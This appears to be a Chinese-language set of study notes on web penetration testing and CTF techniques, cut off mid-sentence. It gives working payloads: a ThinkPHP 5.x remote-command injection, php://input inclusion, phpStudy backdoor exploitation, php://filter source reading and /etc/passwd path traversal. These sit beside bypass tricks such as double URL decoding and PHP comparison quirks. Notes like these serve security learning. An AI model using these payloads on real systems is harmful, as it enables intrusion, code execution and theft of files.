x35 x开头一般为 Hex 编码
字符串格式化偏移漏洞 吃掉引号的方法 : var_dump(spritf("1%'#10s9","monkey"))
var_dump(spritf("%1$'10s","monkey"))
robots.txt
ThinkPHP 5.X payload-->
?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令
文件包含 -->代码执行
条件:所包含文件为用户可控
payload:
可控变量=php://input &&
post提交:<?php 代码?>
经过查询php手册得知,对于编码后的字符串发送到服务器端,php总是会自动进行解码,而我们再使用urldecode函数就是进行了二次解码,虽然这个没问题,但是带来了安全隐患。 比如编码后的字符串%2527提交到后台,php首先进行一次自动解码,%25编码后是%,因此我们收到的字符串是%27,而如果这时我们调用了urldecode的话,会再次进行解码,%27变为’,这样就成功了躲过了我们过滤系统,
构造payload时,特殊字符需要转码(url编码) 如:# ? 等
正则表达式正,/i 大小写不敏感
[]匹配[]中列出的字符,注意,-为起始终止,见下
2[0-4]d:表示20 or 21 or 22 or 23 or 24共5组数中的一组
|或者
25[0-5]表示250 or 251 or 252 or 253 or 254 or 255中的一个
[01]?表示,0 or 1中的一个
.必须有一个.
{3}表示共有3组上述的数组
https://github.com/Mr-xn/BurpSuite-collections 2019渗透测试问题
ping -n 指定发包数量 windows
ping -c 指定发包数量 Linux
phpStudy后门详解:
漏洞版本:2016 2018
利用方式:请求头添加Accept-Charset:(base64编码之后的代码)
注意:需要把空格删掉
mysq支持使用 16进制数据 和二进制数据
0x开头表示16进制 0b开头表示二进制
file=php://filter/read=convert.base64-encode/resource=index.php
file 参数传递
php://filter本地文件访问协议
/read=convert.base64-encode/ 以base64读取的方式是base64编码后
ext3 Linux日志加载文件
WordPress < 3.6.1 PHP 对象注入漏洞
php反序列化unserialize小特性:
'O:+4:"test":1:{s:1:"a";s:3:"aaa";}' 和 'O:4:"test":1:{s:1:"a";s:3:"aaa";}') 结果相同
pyc反编译py文件网址::https://tool.lu/pyc
PHP-- $_SESSION[]接受的参数如果可控,可以传递参数为列表[true,true,true,true,true]
在php的比较中,
true == '123' 为真
true === '123' 为假
git源码泄露处理方式:
使用githack工具下载 工具链接:https://github.com/lijiejie/GitHack
利用.git文件恢复网站版本
Django使用的是gbk编码,超过%F7的编码不在gbk中有意义
当 CURLOPT_SAFE_UPLOAD 为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读取文件。当且仅当文件中存在中文字符的时候,Django 才会报错导致获取文件内容。
路径穿越漏洞 + 任意文件读取:在访问文件的过程中,使用../../../../../../etc/passwd的方式控制访问路径,达到任意文件读取的效果
当访问的路径是一个文件夹的时候,会导入文件夹中的文件内容
当配置etc/nginx/sites-enabled/site.conf配置了localhost /web - img{ alias /iamges/; autoindex on 的时候,访问http://127.0.0.1/web-img../会自动